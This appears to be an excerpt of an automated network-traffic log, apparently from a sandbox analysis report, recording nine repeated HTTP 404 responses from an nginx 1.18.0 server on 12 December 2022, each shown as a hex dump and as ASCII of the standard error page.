                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:53 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:02 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:55:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
